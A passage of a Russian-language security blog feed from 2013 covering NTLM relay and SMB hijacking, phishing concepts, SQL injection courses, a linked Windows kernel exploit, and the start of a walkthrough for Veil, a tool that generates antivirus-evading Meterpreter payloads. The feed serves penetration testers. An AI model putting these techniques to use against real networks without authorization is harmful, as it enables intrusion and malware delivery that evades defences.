экспериментов в последней версии Intercepter-NG. Have fun!</itunes:subtitle><itunes:author>noreply@blogger.com (Dmitry Evteev)</itunes:author><itunes:summary>Затрагивая тему конечных целей тестирований на проникновение, можно отметить, что в преобладающем большинстве случаев ключевой целью атаки является получение максимальных привилегий в корневом домене Active Directory. Как ни крути, но большинство корпоративных сетей построено на решениях Microsoft и как следствие в качестве централизованного управления идентификаторами и механизмами авторизации к информационным активам используется Microsoft Active Directory. Обладая соответствующими привилегиями в каталоге становиться возможным использовать их для развития огромного числа всевозможных сценариев атак. Поэтому, как правило, после "захвата" домена пентест переходит в другие плоскости. Например, в плоскость технологического аудита или в сторону развития атаки в направлении смежных систем, напрямую не завязанных на Active Directory (коммуникационное оборудование, ERP и пр.). Итак, как же можно максимально сократить время на реализацию успешной атаки в отношении каталога домена? Прям до 1 минуты? Я постараюсь раскрыть секрет успеха в данной публикации. Ntlm relay: начало Давным-давно, когда компьютеры были большими брррр... где-то я уже это говорил. В общем, все началось с того, что в компании Microsoft придумали не самый безопасный протокол сетевой аутентификации - LanManager. За ним последовало наследие в виде NTLM, который решал только часть недостатков своего предшественника. Впоследствии, накрутив более тяжелые криптографические алгоритмы, появился NTLMv2, который вместе со своими предшественниками перекантовал и до наших дней. Но вернемся в прошлое. В 1996 году появляется первое исследование на тему фундаментальной уязвимости в протоколе NTLM, а через пять лет появляется и&amp;nbsp;полноценный пруфф. Суть атаки хорошо проиллюстрирована на следующей картинке. В 2008 году, под давлением появившихся к тому времени готовых к употреблению сплоитов (1, 2, 3), компания Microsoft все-таки решает устранить уязвимость, однако делает это как нельзя криво и вектор атаки перерождается в новое амплуа. Кроме того, пресловутый патч ms08-068 никак не стесняет атакующего, который осуществляет атаку в отношении кластера. То есть, сценарий 2001 года частично проигрывается и сегодня. Ntlm relay: сегодня Несмотря на то, что сегодня атака NTLM Relay широко известна, реализованы концепты межпротокольного перенаправления (например, HTTP-&amp;gt;SMB и наоборот), которые в свою очередь портированы в популярные инструменты пентестера (например, MSF), но при всем этом многообразии до 2012 года не хватало универсального "швейцарского ножа". Им стала сборка под названием ZackAttack. ZackAttack – это фреймворк, который позволяет проводить атаки NTLM-relay на качественно новом уровне. Наибольшую ценность этого фреймворка представляет возможность многократного использования сессии авторизованного пользователя для доступа к любым (с ограничениями) сервисам, авторизация в которых базируется на протоколе NTLM. Другими, не менее ценными достоинствами ZackAttack является автоматизация сценариев атаки (например, создание нового пользователя в Active Directory и добавление его в группу администраторов домена), а также возможность взаимодействия с атакуемыми системами используя пониженные привилегии (отличные от привилегий администратора) поверх proxychains&amp;nbsp;(см. видео). Но стоит озвучить и половник дегтя в банке с медом. Дело в том, что Zack Fasel писал свою балалайку на скорую руку, в следствии чего для эффективного использования текущей сборки ZackAttack требуется бубен, а взаимодействие с атакуемым узлом по протоколу SMB поверх proxychains очень быстро заканчивается на первом же бинарном файле (аналогичная ситуация наблюдается и с передачей паролей через RPC). ЗЫ. Если кто желает пофиксить баги ZackAttack и допилить поддерживаемый функционал, welcome! -- &amp;gt;&amp;gt; @zfasel Альтернатива Ntlm relay в режиме реального времени Ранее я уже писал, что в случае использования аутентификации по протоколу NTLMv1 существует возможность восстановить NT-хеш за приемлемое время, что в перспективе позволяет проводить атаки типа pass-the-hash. Однако этот метод не работает в случае использования аутентификации по протоколу NTLMv2. Автор Intercepter-NG взглянул на проблему гораздо шире и глубже. Он задал себе вопрос: "Зачем нам релеить авторизацию жертвы, если она сама прекрасно авторизуется на нужном ресурсе?! Нам всего лишь нужно встать посередине и проксировать соединение, дождаться пока Host_A авторизуется на Host_B, а затем взять контроль над сессией в свои руки!" (подробнее). Логика идеи представлена на картинке ниже. Реализация данной атаки получила название SMB Hijacking и уже доступна для экспериментов в последней версии Intercepter-NG. Have fun!</itunes:summary><itunes:keywords>Microsoft, Ntlm relay, pentest, SMB Hijacking</itunes:keywords></item><item><title>Angry (birds) horse hacked ATM // ШОК ВИДЕО!!!</title><link>http://devteev.blogspot.com/2013/06/angry-birds-horse-hacked-atm.html</link><category>angry birds</category><category>atm</category><category>guinness</category><category>hack</category><category>horse</category><category>money</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Mon, 24 Jun 2013 14:12:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-7105781852340680432</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
ШОК ВИДЕО!11 Конь в футболке Angry birds взламывает банкоматы и использует их в качестве открывашек пива Guinness!&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/08XsFy7_Vq8?feature=player_detailpage" width="540"&gt;&lt;/iframe&gt;
&lt;/center&gt;
&lt;br /&gt;
&lt;div style="text-align: right;"&gt;
&lt;b&gt;От &lt;a href="https://twitter.com/_Endless_Quest_"&gt;режиссера&lt;/a&gt;:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: right;"&gt;
"Просыпаюсь ночью. Хватаю карандаш.&lt;/div&gt;
&lt;div style="text-align: right;"&gt;
Пишу сценарий на обоях.&lt;/div&gt;
&lt;div style="text-align: right;"&gt;
Скандально, вызывающе, амбициозно.&lt;/div&gt;
&lt;div style="text-align: right;"&gt;
Этот видеоролик меняет мировоззрение.&lt;/div&gt;
&lt;div style="text-align: right;"&gt;
Многим будет непонятен, многие просмотрят дважды.&lt;/div&gt;
&lt;div style="text-align: right;"&gt;
Это нормально."&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://img.youtube.com/vi/08XsFy7_Vq8/default.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Hacking Practice Lab (ALL-IN-ONE)</title><link>http://devteev.blogspot.com/2013/06/hacking-practice-lab-all-in-one.html</link><category>vulns</category><category>обучение</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Mon, 24 Jun 2013 12:50:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-2652813450176460990</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
На днях&amp;nbsp;&lt;a href="https://twitter.com/atimorin/"&gt;Александр Тиморин&lt;/a&gt;&amp;nbsp;&lt;a href="https://twitter.com/atimorin/status/347748871344119808"&gt;откопал в Интернете&lt;/a&gt; замечательную структурированную подборку &amp;nbsp;большинства дистрибутивов с предустановленными уязвимыми приложениями. На мой взгляд &amp;nbsp;приведенная коллекция является наиболее полной. Ссылка -&amp;nbsp;&lt;a href="http://www.amanhardikar.com/mindmaps/Practice.html"&gt;http://www.amanhardikar.com/mindmaps/Practice.html&lt;/a&gt;&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtbso0iLhdS0hsIt0yHTdkCt6DBTzgAZs3PmhnVMQkQFrTGgV13hah68NfIUjnmky7V4g5BtazP8D9QolkAW4K9VHRzwtfdCAKyUzZdEojnicgA6CmsUdSPTuox2Z_QS4XjwK0IJ4dZ8o/s1600/Practice.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtbso0iLhdS0hsIt0yHTdkCt6DBTzgAZs3PmhnVMQkQFrTGgV13hah68NfIUjnmky7V4g5BtazP8D9QolkAW4K9VHRzwtfdCAKyUzZdEojnicgA6CmsUdSPTuox2Z_QS4XjwK0IJ4dZ8o/s640/Practice.png" width="361" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtbso0iLhdS0hsIt0yHTdkCt6DBTzgAZs3PmhnVMQkQFrTGgV13hah68NfIUjnmky7V4g5BtazP8D9QolkAW4K9VHRzwtfdCAKyUzZdEojnicgA6CmsUdSPTuox2Z_QS4XjwK0IJ4dZ8o/s72-c/Practice.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total></item><item><title>Презентации с IT &amp; Security Forum 2013 (ITSF 2013)</title><link>http://devteev.blogspot.com/2013/06/it-security-forum-2013-itsf-2013.html</link><category>analytics</category><category>pentest</category><category>security</category><category>web security</category><category>ДБО</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Sat, 15 Jun 2013 11:19:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-4210318622149691279</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
На прошедшем в конце недели&amp;nbsp;&lt;a href="http://www.itsecurityforum.ru/"&gt;IT &amp;amp; Security Forum 2013&lt;/a&gt; совместно с &lt;a href="https://twitter.com/epotseluevskaya"&gt;Евгенией Поцелуевской&lt;/a&gt; рассказали про реалии защищенности современных систем.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;iframe src="http://www.slideshare.net/slideshow/embed_code/23016302" width="427" height="356" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC;border-width:1px 1px 0;margin-bottom:5px" allowfullscreen webkitallowfullscreen mozallowfullscreen&gt; &lt;/iframe&gt; &lt;div style="margin-bottom:5px"&gt; &lt;strong&gt; &lt;a href="http://www.slideshare.net/devteev/e-potseluevskaya" title="Уязвимости систем ДБО в 2011-2012 гг." target="_blank"&gt;Уязвимости систем ДБО в 2011-2012 гг.&lt;/a&gt; &lt;/strong&gt; from &lt;strong&gt;&lt;a href="http://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt;&lt;/strong&gt; &lt;/div&gt;
&lt;br /&gt;
&lt;iframe src="http://www.slideshare.net/slideshow/embed_code/23016163" width="427" height="356" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC;border-width:1px 1px 0;margin-bottom:5px" allowfullscreen webkitallowfullscreen mozallowfullscreen&gt; &lt;/iframe&gt; &lt;div style="margin-bottom:5px"&gt; &lt;strong&gt; &lt;a href="http://www.slideshare.net/devteev/itkzn13-pentest" title="Статистика по результатам тестирований на проникновение и анализа защищенности веб-приложений 2011-2012" target="_blank"&gt;Статистика по результатам тестирований на проникновение и анализа защищенности веб-приложений 2011-2012&lt;/a&gt; &lt;/strong&gt; from &lt;strong&gt;&lt;a href="http://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt;&lt;/strong&gt; &lt;/div&gt;
&lt;/center&gt;

&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Базовый курс по внедрению операторов SQL</title><link>http://devteev.blogspot.com/2013/06/sql.html</link><category>pentest</category><category>sql injection</category><category>web security</category><category>обучение</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Wed, 12 Jun 2013 18:40:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-3722513418447573002</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioIH_n6-d6oLd3_nLO-tKevLaCqkCo1ZzlGUu9d_Cf7zyX7DwVCpGc2xXQJXOV25aXyA7Dfom6KoTkRUfR41J4oCjSSsKwkdWk_M9i21CRupVqRttZ8hE54452qoaXuNM1FKVVNHZh9UQ/s1600/sql-injection.jpeg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioIH_n6-d6oLd3_nLO-tKevLaCqkCo1ZzlGUu9d_Cf7zyX7DwVCpGc2xXQJXOV25aXyA7Dfom6KoTkRUfR41J4oCjSSsKwkdWk_M9i21CRupVqRttZ8hE54452qoaXuNM1FKVVNHZh9UQ/s1600/sql-injection.jpeg" /&gt;&lt;/a&gt;Для желающих подтянуть свои азы хакерского искусства на ресурсе&amp;nbsp;&lt;a href="https://www.pentesterlab.com/"&gt;pentesterlab.com&lt;/a&gt;&amp;nbsp;опубликованы два базовых курса, посвященные развитию атаки с использованием одной из наиболее распространенных уязвимостей - "&lt;a href="https://www.owasp.org/index.php/SQL_Injection"&gt;Внедрение операторов SQL&lt;/a&gt;". Рекомендую! (на заметку преподавателям)&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://pentesterlab.com/from_sqli_to_shell.html"&gt;&lt;b&gt;Ссылка на первый курс&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://pentesterlab.com/from_sqli_to_shell_II.html"&gt;&lt;b&gt;Ссылка на второй курс&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Для тех, кому копания в SQL-инъекциях уже не вставляет, рекомендую сборку&amp;nbsp;&lt;a href="http://sourceforge.net/projects/owaspbricks/files/Torsa%20-%201.3/"&gt;Torsa - 1.3&lt;/a&gt;.&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioIH_n6-d6oLd3_nLO-tKevLaCqkCo1ZzlGUu9d_Cf7zyX7DwVCpGc2xXQJXOV25aXyA7Dfom6KoTkRUfR41J4oCjSSsKwkdWk_M9i21CRupVqRttZ8hE54452qoaXuNM1FKVVNHZh9UQ/s72-c/sql-injection.jpeg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>Using the HTML5 for Phishing Attacks</title><link>http://devteev.blogspot.com/2013/06/using-html5-for-phishing-attacks.html</link><category>client-side attacks</category><category>phishing</category><category>security</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 4 Jun 2013 14:05:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-4595128765782335928</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Бурное развитие технологий неизбежно приводит к появлению новых методов мошеннических действий в отношении неподготовленных пользователей. Так, переход к WEB2++ &amp;amp;&amp;amp; HTML5 позволил превратить жизнь обычных путешественников Интернета в увлекательное интерактивное приключение, в котором можно подцепить какую-нибудь паразитирующую живность, раскрыть номер своей пластиковой карты или попросту передать деньги через &lt;a href="http://www.xakep.ru/post/60612/default.asp"&gt;электронную почту&lt;/a&gt; :)&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlgObY5c1KwKM07F4ILDLytYv0cL8yEcImjWB6o1kd-0rsEX2R-xXF43bucl2pupA_G6VI6z04pEknKM7d98Tz1SItS5PM6-H6HXC3IHumxyTZlFePSYP_md7dfyTr_3T8B-v53zD4GmU/s1600/fake-av.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlgObY5c1KwKM07F4ILDLytYv0cL8yEcImjWB6o1kd-0rsEX2R-xXF43bucl2pupA_G6VI6z04pEknKM7d98Tz1SItS5PM6-H6HXC3IHumxyTZlFePSYP_md7dfyTr_3T8B-v53zD4GmU/s400/fake-av.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Сегодня мне на глаза попались два концепта, которые демонстрируют насколько коварными могут быть современные методы фишинга:&lt;br /&gt;
- &lt;a href="http://jack-shepherd.co.uk/labs/fake_chrome_browser"&gt;Fake Chrome Browser&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://feross.org/html5-fullscreen-api-attack/"&gt;Using the HTML5 Fullscreen API for Phishing Attacks&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Первый концепт демонстрирует полноценную работу браузера &lt;a href="http://www.google.ru/intl/ru/chrome/browser/"&gt;Google Chrome&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiss71hw_BDVTOPQV1Yo35ZKIeesn_xaUT9I1WHGMljQyMmn8wyWOTJ6R430OisAXq_JCQEmxXJCaxGS0c58srCMW4UW7oMKgSuLsjF59Qoka9nC6dzdFM0bohIh_bD6-Ggmd7kYkuz1oI/s1600/FakeChromeBrowser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiss71hw_BDVTOPQV1Yo35ZKIeesn_xaUT9I1WHGMljQyMmn8wyWOTJ6R430OisAXq_JCQEmxXJCaxGS0c58srCMW4UW7oMKgSuLsjF59Qoka9nC6dzdFM0bohIh_bD6-Ggmd7kYkuz1oI/s400/FakeChromeBrowser.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Второй показывает альтернативу атакам, завязанным на приложения "защищенные" SSL-соединением.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFUD5lmo0LVoClUe5jD47Jn6kC8wfxEwFyhFKRuWCGIv77b0Pe5ItwmZth7fcZUf5zfl0dZwGwdrHhUu4Bk9t-JBta76IkYtR6AvTk0ofVSlRQGs667PekbiERSEtUYZaSRs6QdkJBvj0/s1600/html5-fullscreen-api-attack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFUD5lmo0LVoClUe5jD47Jn6kC8wfxEwFyhFKRuWCGIv77b0Pe5ItwmZth7fcZUf5zfl0dZwGwdrHhUu4Bk9t-JBta76IkYtR6AvTk0ofVSlRQGs667PekbiERSEtUYZaSRs6QdkJBvj0/s400/html5-fullscreen-api-attack.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Разумеется, оба примера далеки от продуктивных сборок, чтобы без каких-либо дополнительных усилий начинать собирать деньги с их помощью. Тем не менее, в скором времени стоит ожидать и более изощренных сценариев, применяемых при проведении фишинговых атак. Благо дело, технологии позволяют и все упирается лишь в фантазию злоумышленников. Поэтому будьте бдительны!&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlgObY5c1KwKM07F4ILDLytYv0cL8yEcImjWB6o1kd-0rsEX2R-xXF43bucl2pupA_G6VI6z04pEknKM7d98Tz1SItS5PM6-H6HXC3IHumxyTZlFePSYP_md7dfyTr_3T8B-v53zD4GmU/s72-c/fake-av.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit</title><link>http://devteev.blogspot.com/2013/06/windows-nt2kxp2k3vista2k878-epathobj.html</link><category>0day</category><category>exploits</category><category>windows</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Mon, 3 Jun 2013 17:10:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-742338273567323479</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
В публичном доступе был найден готовый к употреблению эксплоит для уязвимости&amp;nbsp;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3660"&gt;CVE-2013-3660&lt;/a&gt;. Эксплоит доступен по &lt;a href="http://pan.baidu.com/share/link?shareid=517948&amp;amp;uk=1076602916"&gt;следующей ссылке&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhou3r2RFYW2rLOQW-5muxzyRCY7EJFeurCMO8QuoR5-ItoXB5-Z_gjJ-s36Yn5nivjn59bTWerFU2FHZAgtNiOlYmfgFKfPVi131R8NmE8CiH2FR6dDRYCIm1Shvqt_hMp1kM7yJywcaU/s1600/CVE-2013-3660.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhou3r2RFYW2rLOQW-5muxzyRCY7EJFeurCMO8QuoR5-ItoXB5-Z_gjJ-s36Yn5nivjn59bTWerFU2FHZAgtNiOlYmfgFKfPVi131R8NmE8CiH2FR6dDRYCIm1Shvqt_hMp1kM7yJywcaU/s400/CVE-2013-3660.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcKsNJR8QBfjHfiLSE3f6qcOZ_ZSkSP5LhTnDa6o3x1lM2oX-WKEsrLFOcEl1JvVHd0PTTloPz5z9e35ubCzzgDgl_wXsC6XTwTA7jSWP7yn4b29ROiATsWcMLSHmMFwKJ2jnsWsEoCW0/s1600/CVE-2013-3660_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcKsNJR8QBfjHfiLSE3f6qcOZ_ZSkSP5LhTnDa6o3x1lM2oX-WKEsrLFOcEl1JvVHd0PTTloPz5z9e35ubCzzgDgl_wXsC6XTwTA7jSWP7yn4b29ROiATsWcMLSHmMFwKJ2jnsWsEoCW0/s400/CVE-2013-3660_2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
В настоящее время сообщается о наличии сплоета только под 32 разрядную платформу.&lt;br /&gt;
&lt;br /&gt;
Референсы:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://rdot.org/forum/showthread.php?t=2753"&gt;https://rdot.org/forum/showthread.php?t=2753&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.cvedetails.com/cve/CVE-2013-3660/"&gt;http://www.cvedetails.com/cve/CVE-2013-3660/&lt;/a&gt;&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhou3r2RFYW2rLOQW-5muxzyRCY7EJFeurCMO8QuoR5-ItoXB5-Z_gjJ-s36Yn5nivjn59bTWerFU2FHZAgtNiOlYmfgFKfPVi131R8NmE8CiH2FR6dDRYCIm1Shvqt_hMp1kM7yJywcaU/s72-c/CVE-2013-3660.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">455</thr:total></item><item><title>A Payload Generator to Bypass Antivirus</title><link>http://devteev.blogspot.com/2013/06/a-payload-generator-to-bypass-antivirus.html</link><category>metasploit</category><category>payload</category><category>антивирусы</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Mon, 3 Jun 2013 15:59:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-4679057362712272635</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Очередной "булыжник" в сторону большинства современных аверов демонстрирует сборка под названием &lt;a href="https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/"&gt;Veil&lt;/a&gt;. Этот волшебный тулкит представляет из себя генератор полезной нагрузки совместимый с &lt;a href="http://www.metasploit.com/"&gt;MSF&lt;/a&gt; (базируется на &lt;a href="http://www.offensive-security.com/metasploit-unleashed/Msfvenom"&gt;msfvenom&lt;/a&gt;).&amp;nbsp;После окончательной сборки через&amp;nbsp;&lt;a href="http://www.pyinstaller.org/"&gt;Pyinstaller&lt;/a&gt; или&amp;nbsp;&lt;a href="http://sourceforge.net/projects/py2exe/"&gt;Py2Exe&lt;/a&gt;&amp;nbsp;полученная бинарь в настоящее время &lt;a href="https://www.virustotal.com/ru/file/033ab246b527bed25149e35c0d14cad9dbbfeaf12b44480f5d42c1ffa2e0b364/analysis/1370258083/"&gt;распознается&lt;/a&gt;&amp;nbsp;только двумя антивирусными решениями (и не самыми популярными...).&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGkSmKZ02pOYofQaEGXokpEI0BLB7DATYl4GTOB4xz3LtWSzvWVe7TMpZaWFo87vVizqIOOy3wu08nvsH3HzeWD8LE0UgZRBQJ94nElw03pPbjwD09nIV-HLpZouZgI-_DZjJkVHfa0m4/s1600/payload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGkSmKZ02pOYofQaEGXokpEI0BLB7DATYl4GTOB4xz3LtWSzvWVe7TMpZaWFo87vVizqIOOy3wu08nvsH3HzeWD8LE0UgZRBQJ94nElw03pPbjwD09nIV-HLpZouZgI-_DZjJkVHfa0m4/s400/payload.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;div style="text-align: left;"&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;b&gt;Установка и использование&lt;/b&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;"- Kali&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;- Backtrack&lt;/i&gt;&lt;br /&gt;
&lt;div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;- Kali&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;- Backtrack&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;- Okay, take both"&amp;nbsp;&lt;/i&gt;&lt;i&gt;(c) anonymous&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;# git clone https://github.com/ChrisTruncer/Veil.git&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;# cd Veil/setup&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;# ./setup.sh&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
...&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;# ./Veil.py&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
=========================================================================&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013&lt;/div&gt;
&lt;div&gt;
=========================================================================&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
[?] What payload type would you like to use?&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;1 - Meterpreter - Python - void pointer&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;2 - Meterpreter - Python - VirtualAlloc()&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;3 - Meterpreter - Python - base64 Encoded&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;4 - Meterpreter - Python - Letter Substitution&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;5 - Meterpreter - Python - ARC4 Stream Cipher&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;6 - Meterpreter - Python - DES Encrypted&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;7 - Meterpreter - Python - AES Encrypted&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;8 - Meterpreter - C - void pointer&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;9 - Meterpreter - C - VirtualAlloc()&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;0 - Exit Veil&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
[&amp;gt;] Please enter the number of your choice: &lt;b&gt;7&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
=========================================================================&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013&lt;/div&gt;
&lt;div&gt;
=========================================================================&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
[?] Use msfvenom or supply custom shellcode?&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;1 - msfvenom (default)&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;2 - Custom&lt;/div&gt;
&lt;div&gt;
